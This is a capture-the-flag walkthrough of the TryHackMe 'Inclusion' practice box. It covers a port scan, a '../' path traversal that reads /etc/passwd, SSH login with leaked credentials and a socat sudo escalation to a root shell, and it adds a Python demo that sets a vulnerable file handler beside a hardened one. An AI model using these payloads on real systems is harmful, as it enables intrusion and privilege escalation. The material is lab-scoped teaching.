TryHackMe | Inclusion Walkthrough
This is a simple, beginner-level Local File Inclusion (LFI) box.
Reconnaissance
We start with a simple nmap scan:
nmap -sS -sV -A <IP>
We see that two ports are open (22 and 80), which means there must be a web page.
We get this page. We know this is an LFI challenge, but there is no parameter in the URL to inject our LFI payload into. Looking around, we find a parameter by name.
We use this to view the /etc/passwd file. Here we can see the password and username for SSH login, commented out.
../../../../../etc/passwd
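The flaw behind this step, next to a hardened version, as an added example that is not code from the box or from the original walkthrough. The handler names, the directory layout and the file contents are assumptions constructed for the demo; secret.txt stands in for /etc/passwd.

```python
import os
import tempfile
from pathlib import Path


def read_article_vulnerable(base_dir: str, name: str) -> str:
    """The flaw: the request parameter is joined to the base path unchecked."""
    with open(os.path.join(base_dir, name), encoding="utf-8") as fh:
        return fh.read()


def read_article_safe(base_dir: str, name: str) -> str:
    """Resolve the final path first, then require it to stay inside base_dir."""
    base = Path(base_dir).resolve()
    target = (base / name).resolve()  # collapses ../ and follows symlinks
    if base not in target.parents or not target.is_file():
        raise PermissionError(f"rejected article name: {name!r}")
    return target.read_text(encoding="utf-8")


def demo() -> dict:
    """Build a constructed directory tree and run both handlers against it."""
    root = Path(tempfile.mkdtemp())
    articles = root / "app" / "articles"  # hypothetical article directory
    articles.mkdir(parents=True)
    (articles / "lfi-intro").write_text("article body", encoding="utf-8")
    (root / "secret.txt").write_text("outside the web root", encoding="utf-8")

    traversal = "../../secret.txt"
    result = {
        "vulnerable": read_article_vulnerable(str(articles), traversal),
        "safe_ok": read_article_safe(str(articles), "lfi-intro"),
    }
    blocked = 0
    # Both a relative traversal and an absolute path must be refused.
    for bad in (traversal, str(root / "secret.txt")):
        try:
            read_article_safe(str(articles), bad)
        except PermissionError:
            blocked += 1
    result["blocked"] = blocked
    return result


if __name__ == "__main__":
    print(demo())
```

The containment check runs on the resolved path, so it also covers absolute paths and symlinks, which a filter that only strips "../" from the input would miss.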
We use the credentials to log in via SSH:
ssh falconfeast@<IP>
rootpassword
Here we find our first flag.
Privilege escalation
Checking for commands that we can run as root:
sudo -l
Using the payload from GTFOBins for socat:
sudo socat stdin exec:/bin/sh
Finally, we have our root flag!!